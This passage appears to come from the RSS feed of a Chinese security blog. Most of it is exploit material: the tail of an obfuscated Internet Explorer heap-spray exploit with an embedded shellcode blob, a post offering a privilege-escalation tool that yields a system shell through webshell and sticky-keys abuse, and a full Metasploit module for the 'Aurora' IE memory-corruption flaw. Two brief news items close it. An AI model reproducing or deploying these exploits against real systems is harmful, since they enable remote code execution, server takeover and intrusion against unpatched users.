    var shellcode = unescape('%u9999%u96fd%u3f46%u4a9f%u4a4f%uf542%u3748%u4346%u9992%u99f5%u2f47%u924f%ud69f%u3f37%uf546%u3f49%ufdf8%u3f41%u9f43%ud646%ufd3f%u42f8%u4e98%u9190%ud697%u4837%u4e3f%uf54b%u9147%u91f9%uf93f%u4e90%u4e90%u9148%uf596%uf998%u9837%u4a93%u4391%ufd96%uf947%u97f9%u9837%u994f%u98f8%u2f41%u984e%u9098%uf548%u464e%u4742%uf548%u9b4b%u9146%u9793%u373f%u9f9b%uf548%u4840%u4690%ud640%uf92f%u9b46%u934b%u424a%u9848%uf84e%u49d6%u4992%u2ffd%u9093%u2f46%u409f%u909b%u9f43%u3ff5%u2f4e%u9399%u4b99%u46d6%u9342%uf94e%u904f%u4e90%u2ffc%u4f90%u2f42%u9ffc%u4349%uf846%ufc97%u4a37%u964e%u984f%uf83f%u3f3f%u3ff9%u933f%uf52f%u4f41%u4b2f%u4191%u4e96%u4047%uf8fc%u4a93%u9342%u4146%u9b4a%u4248%u4f9b%u993f%u434b%ufd93%uf598%uf5d6%u49f9%u423f%u9396%ufcd6%uf59f%u4943%u2f47%u4b2f%u4e49%u4f4f%uf82f%u9296%u9047%u9b43%u4942%u429b%u4e99%u9297%u374b%u9b4a%u4748%u464b%u4843%u9bf5%u9842%u2f91%u972f%u4241%u4991%u37f5%u9992%u9bd6%u3f9f%u91fc%u43fd%u9696%u93f5%u9640%u4740%u904e%u9037%u2f41%u914b%u4b48%ufc49%ufc9b%u3f40%u9297%u9297%u92f8%u439b%u4797%u9946%u9f47%uf5fc%u4f90%u49f9%u9141%u48f9%u9b2f%u434b%u9bd6%ufc49%u3792%u9048%u4898%u42f9%u4646%u9293%u4398%u4f4a%u374e%uf53f%u4893%u3742%ud640%u9746%u9090%uf541%u482f%u4f9b%u9242%uf547%u979b%u4a96%u90fc%u9249%u9b4b%u9b96%u9646%u494e%ufcf9%u4890%u9693%u4b92%u2f46%u3f43%u432f%u9246%u934a%u2ff5%u4893%ufd41%u2f90%u4b9f%u9292%u4e40%u9897%u4f41%u4849%u4ff8%u4b9f%u373f%u3f49%u904a%u4a3f%ud64f%uf993%u93fd%u4f4b%u992f%u4afc%uf596%u4a4e%u2f93%u9f48%u3f93%u49fd%u4896%u913f%u484b%u4a97%uf89f%ufc92%ufd90%ufc3f%u42fc%uf89f%u4192%uf92f%u962f%u4f4b%u4247%u4842%u984b%u439f%u4e9b%u404f%ud62f%u9991%u9143%u40f9%u3f93%u989b%u9391%u9f99%u9191%u49fd%u983f%u9b48%u46fc%u4b92%u4a91%ufc42%u939b%u4e97%u4242%u91f9%ufdf9%u2f2f%u434f%u3790%u9941%u4149%u2f98%u469f%u414e%u964f%u9b2f%uf5d6%u9b43%u9f42%ud649%ud6f8%u4a4b%u9649%u4647%u4b4f%u49f5%uf9f9%u4740%u47fd%u4e4e%u4a43%u9697%u4146%u9b4a%u984b%u904b%u99fd%ufdf9%u4890%uf52f%u46fd%u49f9%u9f9f%uf947%uf53f%u9037%u2f3f%u9290%u9041%u9fd6%u96f5%ufc98%u3ffd%u434f%u434a%u464e%uf993%u903f%u46fd%u9ff8%u4747%u3741%u4642%u9146%ud64b%u9797%u9691%u4ff9%u4991%u2f9b%ufc49%ud69f%u4b99%uf54f%u4a48%u414e%u434e%u3f48%u9349%u489b%u962f%u49f9%uf5fc%u4137%u3f37%u9047%uf992%ud69b%uf940%u4048%u4b41%u983f%u4793%u4099%u97fc%u4697%u4397%u99fc%u9098%u9f41%u9691%ud640%u9f9f%uf59b%u2ff5%u9140%u9197%u4340%u4f97%u9142%u9798%u9992%u3793%ud64e%u2f97%u96fd%ud6d6%u372f%udb93%ud9cc%u2474%ubaf4%ud1fb%ua5cf%u295e%ub1c9%u3133%u1956%uc683%u0304%u1556%u2419%u614e%u3589%u95ae%u52cd%u6ad8%ua32d%ue3bb%u92c8%u90e9%u8799%ud23d%u2bcf%ub6b5%ub8fb%u1ebb%u080c%u7971%u8923%u45b7%u49ef%u39d9%u9ded%u0339%ud03e%u4438%u1b22%u1d68%u8e29%u2a9d%u136f%ufc9f%u2be4%u79e7%udf3a%u835d%u706a%ucbe9%ufa92%uebb5%u2fa3%ud0a6%u44ea%ua21d%u8ced%u4b6f%uf0dc%u723c%ufcd1%ub23d%u1ed5%uc848%ua226%u0b4b%u7855%u8ed9%u0bfd%u6b79%ud8fc%uf81c%u95f2%ua66b%u2b16%udcbf%ua022%u333e%uf2a3%u9764%ua1e8%u8e05%u0754%ud039%uf830%u9a9f%uedd2%uc0a6%uf0b8%u7f2b%uf385%u8033%u9ba5%u0b02%udb2a%ude9a%u130f%u43d1%ubc39%u11bc%ua178%ucc3e%udcbe%ue5bc%u1b3e%u8fdc%u673b%u635a%uf831%u830f%uf9e6%ue005%u6a69%ue7c5');
    RlvzZEYyqXDyrSvnpasCPmbwnFhxrAtuMRPoDPQvG = new Array();
    var hlaFYMOTReecXkoVGjZQCoWrfZwXTkEMeZAVRPcYoraj = 0x86000-(shellcode.length*2);
    var jlIZqNKPCHQCPQBWKDaqFudoJucQBKYWaQnJatZBlZTTDRfwLqgfMEZrVASdRY = unescape('%u0c0c%u0c0c');
    while(jlIZqNKPCHQCPQBWKDaqFudoJucQBKYWaQnJatZBlZTTDRfwLqgfMEZrVASdRY.length<hlaFYMOTReecXkoVGjZQCoWrfZwXTkEMeZAVRPcYoraj/2) { jlIZqNKPCHQCPQBWKDaqFudoJucQBKYWaQnJatZBlZTTDRfwLqgfMEZrVASdRY+=jlIZqNKPCHQCPQBWKDaqFudoJucQBKYWaQnJatZBlZTTDRfwLqgfMEZrVASdRY; }
    var zMyiLPDAcKyxwnXuSUMgqjlcZgOGKUzNaaFYTOBIweLKVUxh = jlIZqNKPCHQCPQBWKDaqFudoJucQBKYWaQnJatZBlZTTDRfwLqgfMEZrVASdRY.substring(0,hlaFYMOTReecXkoVGjZQCoWrfZwXTkEMeZAVRPcYoraj/2);
    delete jlIZqNKPCHQCPQBWKDaqFudoJucQBKYWaQnJatZBlZTTDRfwLqgfMEZrVASdRY;
    for(ayEdmPtMHQQiQmKWsJuHANTu=0; ayEdmPtMHQQiQmKWsJuHANTu<270; ayEdmPtMHQQiQmKWsJuHANTu++) {
        RlvzZEYyqXDyrSvnpasCPmbwnFhxrAtuMRPoDPQvG[ayEdmPtMHQQiQmKWsJuHANTu] = zMyiLPDAcKyxwnXuSUMgqjlcZgOGKUzNaaFYTOBIweLKVUxh + zMyiLPDAcKyxwnXuSUMgqjlcZgOGKUzNaaFYTOBIweLKVUxh + shellcode;
    }
}
function crash(){
    myfun1();    
    var CQqbQpYwnNgtviXfsHldLcQuPpqeARtmICXiaupKQzVieEZaMIHMcKMxQSkhxLISlBakYmlYjtVliXfcizLkbmOvNVtWbvLE = document.createElement('body');
    CQqbQpYwnNgtviXfsHldLcQuPpqeARtmICXiaupKQzVieEZaMIHMcKMxQSkhxLISlBakYmlYjtVliXfcizLkbmOvNVtWbvLE.addBehavior('#default#userData');
    document.appendChild(CQqbQpYwnNgtviXfsHldLcQuPpqeARtmICXiaupKQzVieEZaMIHMcKMxQSkhxLISlBakYmlYjtVliXfcizLkbmOvNVtWbvLE);
    try {
        for (ayEdmPtMHQQiQmKWsJuHANTu=0; ayEdmPtMHQQiQmKWsJuHANTu<10; ayEdmPtMHQQiQmKWsJuHANTu++) {
            CQqbQpYwnNgtviXfsHldLcQuPpqeARtmICXiaupKQzVieEZaMIHMcKMxQSkhxLISlBakYmlYjtVliXfcizLkbmOvNVtWbvLE.setAttribute('s',window);
        }
    } catch(e){ }    
    window.status+='';
}

document.getElementById('mybtn').onclick();
</script></body></html>]]> http://www.friddy.cn/article.asp?id=118 <![CDATA[360本地提权webshell下测试程序]]> root@friddy.cn(friddy) Tue,02 Feb 2010 14:40:47 +0800 http://www.friddy.cn/default.asp?id=118 在webshell下运行360test.exe

成功后,3389到服务器,按5下shift,得到一个cmd



PS:由于需要本地权限,对个人用户不会造成影响,危害也不是大范围的。

测试程序:

下载文件 点击下载此文件

密码:friddy

]]> http://www.friddy.cn/article.asp?id=116 <![CDATA[Aurora 确定了]]> root@friddy.cn(friddy) Sun,17 Jan 2010 23:05:18 +0800 http://www.friddy.cn/default.asp?id=116 # $Id: ie_aurora.rb 8136 2010-01-15 21:36:04Z hdm $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
        Rank = NormalRanking

        include Msf::Exploit::Remote::HttpServer::HTML
        include Msf::Exploit::Remote::BrowserAutopwn
        autopwn_info({
                :ua_name    => HttpClients::IE,
                :ua_minver  => "6.0",
                :ua_maxver  => "8.0",
                :javascript => true,
                :os_name    => OperatingSystems::WINDOWS,
                :vuln_test  => nil, # no way to test without just trying it
        })


        def initialize(info = {})
                super(update_info(info,
                        'Name'           => 'Microsoft Internet Explorer "Aurora" Memory Corruption',
                        'Description'    => %q{
                                This module exploits a memory corruption flaw in Internet Explorer. This
                        flaw was found in the wild.
                        },
                        'License'        => MSF_LICENSE,
                        'Author'         =>
                                [
                                        'unknown',
                                        'hdm'      # Metasploit port
                                ],
                        'Version'        => '$Revision: 8136 $',
                        'References'     =>
                                [
                                        ['URL', 'http://www.microsoft.com/technet/security/advisory/979352.mspx'],
                                        ['URL', 'http://wepawet.iseclab.org/view.php?hash=1aea206aa64ebeabb07237f1e2230d0f&type=js']

                                ],
                        'DefaultOptions' =>
                                {
                                        'EXITFUNC' => 'process',
                                },
                        'Payload'        =>
                                {
                                        'Space'    => 1000,
                                        'BadChars' => "\x00",
                                        'Compat'   =>
                                                {
                                                        'ConnectionType' => '-find',
                                                },
                                        'StackAdjustment' => -3500,
                                },
                        'Platform'       => 'win',
                        'Targets'        =>
                                [
                                        [ 'Automatic', { }],
                                ],
                        'DisclosureDate' => 'Jan 14 2009', # wepawet sample
                        'DefaultTarget'  => 0))
        end

        def on_request_uri(cli, request)

                if (request.uri.match(/\.gif/i))
                        data = "R0lGODlhAQABAIAAAAAAAAAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw==".unpack("m*")[0]
                        send_response(cli, data, { 'Content-Type' => 'image/gif' })
                        return
                end

                var_memory    = rand_text_alpha(rand(100) + 1)
                var_boom      = rand_text_alpha(rand(100) + 1)
                var_x1        = rand_text_alpha(rand(100) + 1)
                var_e1        = rand_text_alpha(rand(100) + 1)
                var_e2        = rand_text_alpha(rand(100) + 1)

                var_comment   = rand_text_alpha(rand(100) + 1);
                var_abc       = rand_text_alpha(3);

                var_ev1       = rand_text_alpha(rand(100) + 1)
                var_ev2       = rand_text_alpha(rand(100) + 1)
                var_sp1       = rand_text_alpha(rand(100) + 1)

                var_unescape  = rand_text_alpha(rand(100) + 1)
                var_shellcode = rand_text_alpha(rand(100) + 1)
                var_spray     = rand_text_alpha(rand(100) + 1)
                var_start     = rand_text_alpha(rand(100) + 1)
                var_i         = rand_text_alpha(rand(100) + 1)

                rand_html     = rand_text_english(rand(400) + 500)

                html = %Q|<html>
<head>
<script>

        var #{var_comment} = "COMMENT";

        var #{var_x1} = new Array();
        for (i = 0; i < 200; i ++ ){
           #{var_x1} = document.createElement(#{var_comment});
           #{var_x1}.data = "#{var_abc}";
        };

        var #{var_e1} = null;

        var #{var_memory} = new Array();
        var #{var_unescape} = unescape;

        function #{var_boom}() {

                var #{var_shellcode} = #{var_unescape}( '#{Rex::Text.to_unescape(regenerate_payload(cli).encoded)}');

                var #{var_spray} = #{var_unescape}( "%" + "u" + "0" + "c" + "0" + "d" + "%u" + "0" + "c" + "0" + "d" );

                do { #{var_spray} += #{var_spray} } while( #{var_spray}.length < 0xd0000 );

                for(#{var_i} = 0; #{var_i} < 100; #{var_i}++) #{var_memory}[#{var_i}] = #{var_spray} + #{var_shellcode};
        }

        function #{var_ev1}(evt){
                #{var_boom}();
            #{var_e1} = document.createEventObject(evt);
            document.getElementById("#{var_sp1}").innerHTML = "";
            window.setInterval(#{var_ev2}, 50);
        }

        function #{var_ev2}(){
          p = "\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d";
          for (i = 0; i < #{var_x1}.length; i ++ ){
              #{var_x1}.data = p;
          }

          var t = #{var_e1}.srcElement;
        }
</script>
</head>
<body>

<span id="#{var_sp1}"><img src="#{get_resource}#{var_start}.gif" onload="#{var_ev1}(event)"></span></body></html>

</body>
</html>
                |

                # Transmit the compressed response to the client
                send_response(cli, html, { 'Content-Type' => 'text/html', 'Pragma' => 'no-cache' })

                # Handle the payload
                handler(cli)
        end
end]]> http://www.friddy.cn/article.asp?id=115 <![CDATA[韩国明年元旦启动网络司令部]]> root@friddy.cn(friddy) Fri,04 Dec 2009 15:01:44 +0800 http://www.friddy.cn/default.asp?id=115     韩国国防部官员12月1日说,集网络攻击与网络防护于一身的独立网络司令部定于明年元旦正式启用。
 
 “这(网络司令部)是一支独立部队,由200名专业技术人员构成,一名少将统管。”一名没有公开姓名的国防部官员告诉韩国联合通讯社。

  韩联社援引另一国防部官员的话报道,网络司令部全面运作可能是在明年年中。

  韩国总统府、国防部等机构的计算机网络今年7月连续遭遇黑客攻击,韩国国防部随后决定成立网络司令部。韩国国防安全司令部先前指责朝鲜黑客制造这些袭击活动。

  依照韩联社说法,韩国独立网络司令部不仅承担网络安全维护与防护任务,还具备互联网攻击能力,可扰乱别国重要机构的网络运行。

]]> http://www.friddy.cn/article.asp?id=114 <![CDATA[milw0rm再次“复活”了]]> root@friddy.cn(friddy) Mon,30 Nov 2009 12:56:22 +0800 http://www.friddy.cn/default.asp?id=114
http://www.exploit-db.com/]]>